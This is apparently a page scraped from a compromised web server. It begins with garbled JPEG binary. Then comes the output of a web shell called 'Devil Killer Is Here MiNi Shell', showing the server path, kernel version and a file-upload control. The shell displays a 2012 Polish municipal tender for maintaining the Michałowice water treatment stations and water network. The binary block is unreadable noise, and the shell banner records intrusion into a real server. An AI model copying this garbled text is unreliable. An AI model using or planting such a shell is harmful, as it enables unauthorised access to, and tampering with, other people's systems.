JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121212/505962-N-2012.html

<p class="kh_header"><b>Michałowice: Konserwacja stacji uzdatniania wody oraz sieci wodociągowej z przyłączami na terenie Gminy Michałowice w roku 2013 - nr sprawy: ZP.2712.91.2012</b><br>
<b>Numer ogłoszenia: 505962 - 2012; data zamieszczenia: 12.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Michałowice , Reguły, Aleja Powstańców Warszawy 1, 05-816 Michałowice, woj. mazowieckie, tel. 22 350 91 91, faks 22 350 91 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.michalowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja stacji uzdatniania wody oraz sieci wodociągowej z przyłączami na terenie Gminy Michałowice w roku 2013 - nr sprawy: ZP.2712.91.2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zlecenia obejmuje wykonywanie zadań przedsiębiorstwa wodociągowego określonych w ustawie z dnia 7 czerwca 2001 r. o zbiorowym zaopatrzeniu w wodę i zbiorowym odprowadzeniu ścieków (Dz. U. z 2006 r. 
Nr 123, 858 ze zm.), w tym:
- eksploatację, obsługę i konserwację Stacji Uzdatniania Wody,
- ciągłą dostawę wody o odpowiedniej jakości i pod odpowiednim ciśnieniem do odbiorców z terenu Gminy Michałowice,
Szczegółowy opis przedmiotu zamówienia:
Do obowiązków Wykonawcy będzie należała kompleksowa obsługa stacji uzdatniania wody, studni głębinowych łącznie z pełną kontrolą stanu sanitarno-epidemiologicznego wydobytej i uzdatnionej wody. Wykonawca eksploatował będzie i konserwował urządzenia zamontowane na SUW, studniach głębinowych, zbiornikach rejestrują ilości wydobytej i uzdatnionej wody.  Konserwacja obejmuje dwie Stacje Uzdatniania Wody, położone w Komorowie i Pęcicach oraz sieć wodociągową położoną na terenie Gminy Michałowice, w miejscowościach: Michałowice, Michałowice Wieś, Nowa Wieś, Komorów, Granica, Pęcice, Pęcice Małe, Sokołów, Suchy Las, Opacz-Kolonia, Opacz Mała, Reguły oraz usuwanie awarii na sieci wodociągowej i przyłączach.

A)	Stacja Uzdatniania Wody w Pęcicach: 
- oddana do eksploatacji w latach osiemdziesiątych, w latach 2005-2007 przeszła generalną modernizację, zastąpiono stare urządzenia uzdatniające wprowadzając nową technologię, wybudowano zbiornik wody czystej, zbiornik popłuczyn i pompownię II stopnia, w ramach modernizacji dokonano zmiany obudów studni głębinowych oraz całkowitego remontu budynku stacji.
- Stacja posiada dwie studnie głębinowe poboru wody, zlokalizowane na terenie, pobierające wodę z lokalnych zasobów IV rzędowych. 
- Zasoby eksploatacyjne ujęcia zostały ustalone i zatwierdzone decyzją na ilość 59, 00 m3 na h; średnio na dobę 780 m3 na d
- Pompownia I stopnia przewiduje naprzemienną pracę dowolnej studni lub w przyszłości dwóch dowolnych studni.
- Zaprojektowano i wykonano filtracje ciśnieniową I i II stopnia w filtrze Eurowater typ TFB 100 wraz z napowietrzaniem filtru I stopnia i II stopnia. 
- Wydajność dyspozycyjna 2880 m3 na d
- Zbiornik wody czystej o pojemności całkowitej 655,00 m3 dwukomorowy, pozwalający na eksploatacje jednej wybranej dowolnej komory.
- Pompownia II stopnia Hydro-Vacum typ ZHA 7.03.5 w oparciu o pompę typ OPA 7.03. W zestawie 5 pomp, spośród których jedna (dowolna) może pełnić funkcje rezerwowej. Pompownia współpracuje ze zbiornikiem hydroforowym o pojemności 1000 dm3. Wydajność pompowni sterowana w funkcji zmian ciśnienia w kolektorze tłocznym w stosunku do nastawionego. Ciśnienie nastawiane w zakresie 0,45-0,55 MPa.
- Na stacji znajduje się zamontowany na stałe agregat prądotwórczy typ TJD 100 firmy TADO, który w przypadku braku zasilania w energię elektryczną z Zakładu Energetycznego zostaje uruchomiany automatycznie, nie powodując spadków ciśnienia w sieci.
- Stacja pracuje w pełnej automatyce - bez obsługowo, eksploatacja sprowadza się tylko do kontroli parametrów i zasilania agregatu w paliwo. 
- Sieć wodociągowa budowana głównie w latach osiemdziesiątych, średnicy 160 i 110 mm z PCV.
- Stacja w Pęcicach zasila następujące miejscowości: Pęcice, Pęcice Małe, Sokołów i Suchy Las. 
- Stacja  zlokalizowana jest na terenie o pow. 1 300 m2.
B)	Stacja Uzdatniania Wody w Komorowie:
- oddana do eksploatacji w roku 1993, oparta jest o ujęcie wód podziemnych z utworów czwartorzędowych, składające się z trzech studni wierconych o głębokości. Aktualna maksymalna wydajność 114,60m3 na h, średnio na dobę 2292,00 m3 na d.
- Technologia uzdatniania oparta jest na filtracji ciśnieniowej z napowietrzeniem wody surowej. Usuwanie głównie żelaza i manganu (4 odżelaziacze i 3 odmanganiacze). Woda magazynowana jest w zbiorniku o dwóch komorach o pojemności 300 m3 każdy. Płukanie wodą uzdatnioną i sprężonym powietrzem wysokociśnieniowym - odbywa się ręcznie. 
- Pompownia II stopnia firmy Hydro-MDF16-CR45.3 11kW. Pompownia współpracuje ze zbiornikiem hydroforowym membranowym typ Reflex 1001D o pojemności całkowitej 1000 dm3 i użytkowej 750 dm3, Pn= 1,0 MPa.
- Agregat prądotwórczy o mocy 80 kW z silnikiem CUMMINS jako rezerwowe źródło zasilania który w przypadku braku zasilania w energię elektryczną z Zakładu Energetycznego zostaje uruchomiany automatycznie, nie powodując spadków ciśnienia w sieci.
- Stacja zbudowana była w latach 1990-1993 początkowo bez zbiornika wody czystej, a w roku 1996 oddano do eksploatacji zbiornik wody czystej. Sieć wodociągowa budowana od roku 1993 wykonana jest prawie całkowicie z PCV PN 10 średnicy głównie 110 mm, jedynie odcinki przy Stacji Wodociągowej są średnicy 215 mm, 160 mm. 
- Stacja zasila następujące miejscowości: Nowa Wieś,  Komorów,  Granica, 
- Stacja  zlokalizowana jest na terenie o pow.  4 889 m2
Pozostałe miejscowości Gminy a więc: Opacz Kolonia, Opacz Mała i Reguły zasilane są w wodę z sieci MPWiK (wodociąg centralny).  Rozliczanie z MPWiK na podstawie odczytów wodomierzy zamontowanych w  studniach wodomierzowych, umiejscowionych w Opaczy Kolonii przy ul. Polnej i w Regułach przy ul. Orzeszkowej. Rozliczenia odbywają się pomiędzy MPWiK-iem, a Gminą. 
C)	Sieć wodociągowa
- Łącznie długość sieci wodociągowej na terenie Gminy Michałowice objętej konserwacją wynosi ok.: 
125,7 km.
- Ilość przyłączy wynosi objętych konserwacją: ok. 3900 szt.
- Ilość czynnych zdroi ulicznych: 1 szt. .
D)	Awarie na sieci wodociągowej i przyłączach:
w roku 2012 - na sieci 24, na przyłączach 12
w roku 2011- na sieci 13, na przyłączach 8.
w roku 2010 - na sieci 12, na przyłączach 13.

Opis merytoryczny przedmiotu zamówienia:
A)	   Szczegółowy zakres konserwacji obejmuje:
Zapewnienie ciągłości i niezawodności usług zbiorowego zaopatrzenia w wodę w standardzie określonym w umowach o zaopatrzenie w wodę i w Regulaminie zbiorowego dostarczenia wody i zbiorowego odprowadzenia ścieków zatwierdzonego Uchwałą Nr XVIII.114.2008 Rady Gminy Michałowice z dnia 31 marca 2008 r. Jakość wody musi odpowiadać wymaganiom Rozporządzeniu Ministra Zdrowia  z dnia 29 marca 2007 r. w sprawie jakości wody przeznaczonej do spożycia przez ludzi  (Dz.U. Nr. 61, poz. 417 z poź. zm). Dostarczana woda musi posiadać dopuszczenie przez  Państwowy Powiatowy Inspektorat Sanitarny.
Kontrolę jakości dostarczanej wody pod względem fizyko-chemicznym i bakteriologicznym tj. dokonywanie, raz w miesiącu, przez wyspecjalizowane akredytowane laboratorium okresowych badań próbek wody pobieranych z eksploatowanej sieci w wyznaczonych przez Zamawiającego miejscach (trzy punkty) i składanie Zamawiającemu wyników badań na koniec każdego miesiąca. 
Wykonywanie poboru i badań wód popłucznych odprowadzanych ze Stacji Uzdatniania Wody zgodnie z obowiązującymi przepisami (na koniec każdego kwartału i przekazywanie ich w terminie 30 dni po zakończeniu kwartału do Urzędu Gminy Michałowice).
Zapewnienie całodobowego telefonicznego alarmowego służącego do przyjmowania zgłoszeń o awariach. Uruchomienie numeru telefonu zgłoszeń awarii zostanie ogłoszone w sposób zwyczajowo przyjęty w Gminie Michałowice (informacja na tablicach informacyjnych w poszczególnych sołectwach oraz na stronie internetowej).
Zapewnienie 24 godzinnego dyżuru na Stacji Uzdatniania Wody w Komorowie i Pęcicach. Do końca miesiąca przekazanie Zamawiającemu grafik dyżurów na kolejny miesiąc.
Przystąpienie do usunięcia awarii w przeciągu 2h od chwili zgłoszenia oraz skuteczne jej usunięcie w zakresie umożliwiającym dostawę wody w terminie do 24 godzin od chwili zgłoszenia w okresie 01.01.2013 do 31.03.2013 jak również 01.11.2013 do 31.12.2013 r.  oraz w terminie 12 h od chwili jej zgłoszenia w pozostałym okresie.
Wykonywanie czynności konserwacyjnych przewidzianych w dokumentacjach techniczno rozruchowych zamontowanych urządzeń oraz w instrukcjach obsługi stacji uzdatniania wody, a w szczególności nadzór nad prawidłowym przebiegiem uzdatniania wody, cyklicznego płukania filtrów i innymi pracami gwarantującymi prawidłową pracę stacji uzdatniania wody i sieci wodociągowej.
Przejęcie w czasie trwania umowy obowiązków określonych w pozwoleniach wodnoprawnych poprzez wykonywanie czynności  we wskazanych terminach i zakresie określonym ww. dokumentach (niepóźnej jednak niż do 31.10.2013). W przypadku zmiany pozwolenia, wiążące są wytyczne zawarte w nowych dokumentach.
Wykonywanie czynności konserwacyjnych przewidzianych w dokumentacjach techniczno rozruchowych zamontowanych pomp oraz wykonanie minimum raz w okresie związania umową (nie później jednak niż do 31.10.2013)  ich czyszczeń w szczególności pomp głębinowych z potwierdzeniem wykonania w protokole odbioru prac za dany miesiąc.
Wykonanie prac konserwacyjnych obudów studni oraz prac zabezpieczających przed napływem wód opadowych i gruntowych do obudów studni, według potrzeb, lub zgodnie z zaleceniami Zamawiającego w terminie 30 dni od otrzymania pisemnej informacji o konieczności.
Utrzymywanie należytej czystości w budynkach oraz na działkach SUW i strefach ochrony studni głębinowych wraz z koszeniem trawy (co najmniej 1 raz w miesiącu w okresie wegetacji roślin, lub wg zleceń Zamawiającego), czyszczeniem zbiorników wód oczyszczonych oraz usuwaniem śniegu (bez wywozu) w celu zapewnienia dojazdu do obiektów i co najmniej 3 miejsc parkingowych na SUW Komorów. 
Zabezpieczanie terenów stacji przed wejściem osób nieupoważnionych. Tereny stacji i studni, mają być bezwzględnie zamykane. 
Dla każdej stacji należy prowadzić dokumentację techniczno rozruchową stacji wraz z książką eksploatacji urządzeń stacji do której należy wpisywać realizację wymaganych prac wraz z potwierdzeniem przez osoby je wykonujące.Przeprowadzenie okresowych dezynfekcji urządzeń wodociągowych wraz z jednoczesną kontrolą jej skuteczności.
Likwidacji w trybie awaryjnym przyczyn odchyleń jakości wody od normy.
Prawidłową eksploatację sieci to jest okresowe płukanie (co miesiąc płukanie sieci lub przyłączy w nie mniej niż 5 punktach wskazanych przez Zamawiającego i odnotowywanie tego w protokole za miesięczną konserwację), utrzymanie w sprawności zainstalowanych hydrantów oraz zasuw wodociągowych (co najmniej raz w roku dokonanie sprawdzenia wszystkich zainstalowanych zasuw i hydrantów, nie później jednak niż do dnia 31.10.2013 r. wraz z przekazaniem stosownego zestawienia informującego o stanie oraz o koniecznych do wykonania pracach), skrzynek, pomiary ciśnienia w sieci itp. 
Zakup i wymianę drobnych elementów np. plomb, zaworów kulowych, tabliczek informacyjnych.
Zakup i wymianę wraz z regulacją skrzynek do zasuw lub hydrantów w miejscach wskazanych przez Zamawiającego (w okresie obowiązywania całej umowy w ilości do 80 szt.). 
Przeprowadzanie okresowych przeglądów technicznych urządzeń SUW oraz sieci wodociągowej wraz z przyłączami i odnotowywanie tego faktu w stosownych rejestrach.
Przeprowadzanie rocznych badań skuteczności ochrony przeciwporażeniowej instalacji elektrycznej i odgromowej oraz przekazanie stosownych protokołów Zamawiającemu (nie później jednak niż do 
30.06.2013 r.).
Dokonywanie okresowych przeglądów urządzeń elektrycznych zgodnie z dokumentacją techniczno rozruchową.
Usuwanie wszelkich awarii urządzeń SUW i sieci wodociągowej (materiały, sprzęt,  robocizna po stronie Wykonawcy), wynikłych z eksploatacji, z wyłączeniem remontów kapitalnych.
Odtwarzanie nawierzchni dróg po usuwanych awariach wykonywanych przez Wykonawcę (konserwatora sieci) bez zbędnej zwłoki, w terminie nie dłuższym niż 5 dni, a przejezdności w czasie 5 godzin od usunięcia awarii. 
Przechowywanie i aktualizację dokumentacji technicznej wodociągów i SUW.
Utrzymywanie w pełnej sprawności wszystkich urządzeń, elementów sieci i przyłączy. W przypadku stwierdzenia złego stanu technicznego któregoś z elementów np. zasuwy, hydrantu, bezwzględne zgłoszenie tego faktu do Zamawiającego.
Dokonywanie raz na dobę odczytów wodomierzy głównych na Stacjach Uzdatniania Wody w Komorowie i Pęcicach, oraz raz na miesiąc wodomierzy zamontowanych na studniach głębinowych oraz wodomierzy kontrolujących ilość wody zakupionej z sieci Miejskiego Przedsiębiorstwa Wodociągów i Kanalizacji w m. st. Warszawie.
Pokrywanie kosztów związanych z przeglądami urządzeń przez Urząd Dozoru Technicznego.
Zapewnienie dostaw wody w razie awarii ze zbiorników na wodę czystą, będących 
w posiadaniu Wykonawcy. W przypadku przerwy w dostawie wody trwającej powyżej 12 h, Wykonawca zobowiązany jest w ciągu 1,5 h podstawić zastępcze źródła wody. W ilości dostosowanej do potrzeb i uzgodnionej przez Zamawiającego.
W przypadku skażenia wody bakteriami Wykonawca ponosi koszty związane z doprowadzeniem całego ujęcia i sieci do stanu zgodnego z przepisami. 
Prowadzenie ewidencji wyposażenia i sprzętu w hydroforniach.
Prowadzenie ewidencji usuwanych awarii z dokładnym podaniem jej zakresu, daty, 
i czasu usunięcia.
Nadzór techniczny nad wykonywanymi robotami wodociągowymi na eksploatowanej sieci i przyłączach. Zamykanie i otwieranie wody zgodnie z zaleceniami Zamawiającego.
Udział w odbiorach technicznych robót wodociągowych, drogowych (w zakresie sieci wodociągowej).
Kontrola poprawności działania urządzeń pomiarowych u odbiorców wody na każdorazowe  żądanie Zamawiającego. W przypadku stwierdzenia uszkodzenia głównego urządzenia pomiarowego, wymiana na nowe (robocizna, sprzęt po stronie Wykonawcy) urządzenie - wodomierz. po stronie Zamawiającego.
Kontrola legalności przyłączy wodociągowych oraz zamontowanych wodomierzy i podliczników.
Wykonywanie innych prac zleconych przez Zamawiającego dotyczących sieci wodociągowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 65.10.00.00-4, 65.13.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w wysokości: 15.000,00 zł. (słownie: piętnaście tysięcy zł 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie zgodnie 
z zał. 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten Zamawiający uzna za spełniony jeżeli Wykonawca dołączy do oferty wykaz wykonanych lub wykonywanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; z podaniem ich rodzaju i wartości, daty i miejsca wykonania. 
W wykazie należy uwzględnić minimum jedną usługę tożsamym do zamówienia charakterze tj. polegającą na konserwacji i eksploatacji SUW oraz sieci wodociągowej wraz z przyłączami o łącznej długości, co najmniej 90 km sieci.
Do wykazu usług należy dołączyć dokumenty potwierdzające, że usługi tam ujęte zostały wykonane należycie (wykaz sporządzić wg zał. nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Warunek dysponowania odpowiednim potencjałem technicznym Zamawiający uzna za spełniony, jeżeli Wykonawca dołączy do oferty wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami. W wykazie należy uwzględnić co najmniej: 1 koparkę, 1 samochód dostawczy, agregat do odwadniania wykopów, zestaw pomp, samochód samowyładowujący, 
1 zagęszczarkę, 1 piłę do ciecia asfaltu, 3 stojakami wraz z urządzeniami do opomiarowania służącymi do płukania sieci (wykaz sporządzić wg zał. nr 6 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)	Warunek dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna za spełniony jeżeli Wykonawca dołączy do oferty wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kontrolę jakości lub kierowanie pracami, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. W wykazie mają być wymienione nast. osoby:
- min. jedna osoba posiadająca uprawnienia wykonawcze bez ograniczeń o specjalności instalacje sanitarne i sieci zewnętrzne wraz z zaświadczeniem o przynależności do Izby Inżynierów,
- min. jedna osoba posiadająca aktualne uprawnienia SEP do min. 1 kV. 
- min. trzy osoby uczestniczące w wykonywaniu zamówienia w branży wodociągowej posiadające stosowną wiedzę. 
Ponadto, wykonawca załączy do oferty oświadczenie że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień tj. uprawnienia zawodowe w branży sanitarnej (uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie - art.12 ustawy Prawo budowlane, wraz ze wskazaniem ich przynależności do właściwej Izby Samorządu Zawodowego) i elektrycznej  (wykaz sporządzić wg zał. nr 7 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca dołączy do oferty opłaconą polisę OC opiewającą na kwotę min. 200.000,00 zł , a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
